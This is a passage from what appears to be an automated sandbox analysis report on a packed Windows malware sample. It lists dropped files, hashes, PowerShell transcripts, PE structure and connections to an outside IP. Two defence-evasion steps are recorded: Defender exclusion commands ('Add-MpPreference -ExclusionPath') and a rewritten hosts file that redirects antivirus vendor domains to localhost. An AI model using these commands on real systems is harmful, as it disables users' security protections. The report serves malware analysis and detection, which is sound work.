Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eovqy115.iwl.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hm5i3shc.tba.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxyhgqf.de5.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwaaxnaf.rts.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzwl01ox.zis.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgos0k0z.2gr.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Desktop\hosts.bak. (copy) Download File
Process:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8944
Entropy (8bit):	5.510727034396864
Encrypted:	false
SSDEEP:	96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:	7EA0FCED249EA6AF785C5BED13F34336
SHA1:	175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:	D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:	false
Preview:	CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.9GYwnzwR.20220114191133.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5555
Entropy (8bit):	5.3807331752623755
Encrypted:	false
SSDEEP:	96:BZjhONyqDo1ZnZahONyqDo1Z0l3tjZkhONyqDo1Zgo99RZu:d
MD5:	1D25826DC4C810920BB7043A30AE63D2
SHA1:	436CD6DB47BD2FA18FD9894FB555CA85D0691F6C
SHA-256:	BC2F4B75059261F23D47FA9576994D2AA1BD7A7C6229247F806D0650832F3282
SHA-512:	57AEA9D43EF3EE117F1A473E8BA48953A946963500CAD80A11DC042F046ED80F3C6C2B838B4D8AD5DB3DF3719C5C91A3C74442490BE9EEC57A18EC85E9BFB799
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191134..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191134..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191540..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.Gl0sshOE.20220114191151.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3234
Entropy (8bit):	5.36056988674478
Encrypted:	false
SSDEEP:	96:BZmhONlaqDo1ZYZrhONlaqDo1ZtAUU5Zj:r4T
MD5:	3290B019E42A1E78B3283DD28F0661C3
SHA1:	D42E3457C990593097D757AB2D3B0773CC11BB18
SHA-256:	4DDD8C0735832D92EA6A6ACFD946E21B09F294D6BA9EF26CE80990171A30AF82
SHA-512:	7EC35D5E28662E72080E0974131623FFE54F0F3B4A90478638FB06A66A5BA4ED07E48874B26F4EF37FFE7C9EE9E5CAC5B6015BA02174CABEC171B5564C603000
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 3200..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191153..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191552..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.IZ24yRiA.20220114191200.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3234
Entropy (8bit):	5.361420377712193
Encrypted:	false
SSDEEP:	48:BZJvhOoOmN7JqDYB1ZxN1ZyvhOoOmN7JqDYB1ZwvtcNG+3DtcNG+3DtcNG+3UZZD:BZFhONWqDo1ZRZOhONWqDo1ZwAUUEZl
MD5:	A8930FE14D4FC2754F54AEFE62DFDCE6
SHA1:	56E5460F3F9016DE19C236FC5227B22EE10C8847
SHA-256:	86553318C3C4409CC0D5D12D87B22D66E6227F6280DCE7B1AA73A9AC54865CA2
SHA-512:	64B21B418DA6B2EB49474577134EF2D591982CA2401FFAD79BA8B96B2C11184BA56B963825E4CA90AA101B5FDDAA96686E698875619968049825D934DEB0D9D2
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191200..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 5572..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191200..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..********************..Windows PowerShell transcript start..Start time: 20220114191618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.PhAlNio2.20220114191140.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5655
Entropy (8bit):	5.3705714673168155
Encrypted:	false
SSDEEP:	96:BZXhONAcqDo1ZthZQhONAcqDo1ZQo+wjZ0yhONAcqDo1ZflggZZa:Ni
MD5:	2BB66BADA2AA66EBFB5A113905A90C49
SHA1:	2C3334B7D66F07C03644215E467F083AD5D89238
SHA-256:	704D02101792089CDB8C56257196B1A2ED153AA4AA9EA3558E6C64707A6025F4
SHA-512:	D99076FAFE53C0F1E45BE7AD377F781FB5A01A12844E1D058C1D80C267E41310AD05C92443889D55E67415C83225087C5F4A60DCCA2D54C633F3F148B3F58998
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191141..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 5616..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191141..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191520..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Users\user\Documents\20220114\PowerShell_transcript.358075._bhdDFjc.20220114191205.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3291
Entropy (8bit):	5.3500089296848365
Encrypted:	false
SSDEEP:	96:BZWhONAlqDo1ZIhZ1hONAlqDo1ZadZZmZs:+
MD5:	2F603ABDABD1B16AAE8EFAAF1013FDA8
SHA1:	C83105F78E3290BAB49329B87CA417BA3CD00081
SHA-256:	BE7CC110A610AE0A60E00E8ABD5A41177CA779EB47E02284D1F89ED7F8DC8DD8
SHA-512:	290757A7D4DA286425E06C38C56B92324629CB9CB56CD3BC7230836B55CBAF9E5BC6290E74A15B486743FE9C5E529349A0176BBDCE3078B1B1D856954E716DFA
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191207..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191207..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Users\user\Documents\20220114\PowerShell_transcript.358075.modYJzHz.20220114191155.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3291
Entropy (8bit):	5.351849438556751
Encrypted:	false
SSDEEP:	96:BZ7hONABqDo1Z9hZXhONABqDo1Z1dZZkZF:u
MD5:	541EBD96FE5F89B568C4F516BD606AED
SHA1:	4565038A42D265855BEA5C8F5D78B7C39781FFA6
SHA-256:	1A74BF462436C37C738EBE17DCD53254BBB84F2DAE22BC6C03C079E5B541E825
SHA-512:	8E84045720D67948328E4820952BD4C8DC1A5A7B0D5252FECFF5576B3AA7F9C807E1CEEC40A84D31916433A7241E878D1A8A8DDC46C137884BD8134C358D893B
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220114191156..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 2924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220114191156..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..********************..Windows PowerShell transcript start..Start time: 20220114191602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros

C:\Windows\System32\drivers\etc\hosts Download File
Process:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8944
Entropy (8bit):	5.510727034396864
Encrypted:	false
SSDEEP:	96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:	7EA0FCED249EA6AF785C5BED13F34336
SHA1:	175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:	D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:	true
Preview:	CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0

\Device\Null Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	466
Entropy (8bit):	4.892440045701878
Encrypted:	false
SSDEEP:	12:IStfsj/zRLV85+VuIHSk/ko+jLbdhFp+9Hv:ntQF5utk/ko+3bdhy
MD5:	EC0CD8FB16185F3892DD2C39D6FC2FE9
SHA1:	53FB6A2E739DA030FE1D1BBFB9481E0CDE1765F7
SHA-256:	0183B25F759F83A5F6F6330B9AFA0078E6B23BD0081CFAD7ACD7925976DE392F
SHA-512:	9C25E6DD2B9D35C0DCB8AFB4B8F431BE5C6D1A7AAD75B426E4FD52DDBAAF00186FF913123957E8203EDA1880158FB551B4816C9628D320D8893E729F93EC74B0
Malicious:	false
Preview:	Add-MpPreference : You don't have enough permissions to perform the requested operation...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Micros .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0xc0000142,Add-MpPreference.. ..

Static File Info

General
File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.8679927345645195
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File size:	1843200
MD5:	8fb77edbae0c40e1e19d82a406b7615a
SHA1:	0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
SHA512:	4de4c2b2f6c72de263cb0ed42df2f6fc502582a795cc00cd47f33465575e3ee1e85d28b9383e3c2d258e3dc3dd665cab34c4c3f609b3c7145a9e8d0d284da508
SSDEEP:	49152:w7tSsBqGiSI6UlFlD6p0PDmkpcaNv9eSY9h:wZSsqPJ60qCR7Nq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........8M.......#...... ........3...O...3...@...............................P............... ............................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x8fe990
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6ed4f5f04d62b18d96b26d6db7c18840

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFE3E68Ah]
dec eax
lea edi, dword ptr [esi-0033C025h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F9F20B1E955h
add ebx, ebx
je 00007F9F20B1E904h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F9F20B1E923h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F9F20B1E91Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F9F20B1E8F1h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F9F20B1E912h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F9F20B1E8F2h
rep ret
cld
inc ecx
pop ebx
jmp 00007F9F20B1E90Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F9F20B1E8E8h
lea eax, dword ptr [ecx+01h]
jmp 00007F9F20B1E909h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F9F20B1E8E6h
sub eax, 03h
jc 00007F9F20B1E91Bh
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007F9F20B1E95Ah
sar eax, 1

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4ff000	0x9c	UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x33c000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x33d000	0x1c2000	0x1c1c00	False	0.975809586055	data	7.86864211163	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX2	0x4ff000	0x1000	0x200	False	0.1953125	data	1.37191358908	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:11:32.579027891 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:32.635747910 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:32.635886908 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.632904053 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.688898087 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:34.689019918 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.691591024 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.747591019 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:34.750452042 CET	20000	49751	185.112.83.96	192.168.2.3
